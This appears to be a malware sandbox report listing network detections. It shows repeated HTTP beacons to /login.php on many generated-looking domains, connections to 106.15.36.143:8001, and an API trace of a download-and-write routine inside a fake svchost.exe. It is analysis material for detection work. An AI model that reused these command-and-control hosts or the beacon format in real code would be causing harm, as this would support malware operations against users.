Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_414682.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.36.143:8001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_414682.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.36.143:8001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240908-1853-3379-8a1b-ce08bd3461b1 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1725785613.7387215
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9e HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1725785614.8678415
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comCookie: sid=b166d882-6dbf-11ef-90a1-9c5e8dd41795
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_414682.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.36.143:8001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_414682.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.36.143:8001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1725785613.7387215
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1725785614.8678415
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240908-1854-12c0-8240-bdabdc5d8efa HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1725785613.7387215
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1725785614.8678415
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.36.143
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC4AB0 memset,GetProcessHeap,HeapAlloc,memset,memcpy,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,memset,InternetReadFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,RtlFreeHeap,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_02BC4AB0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
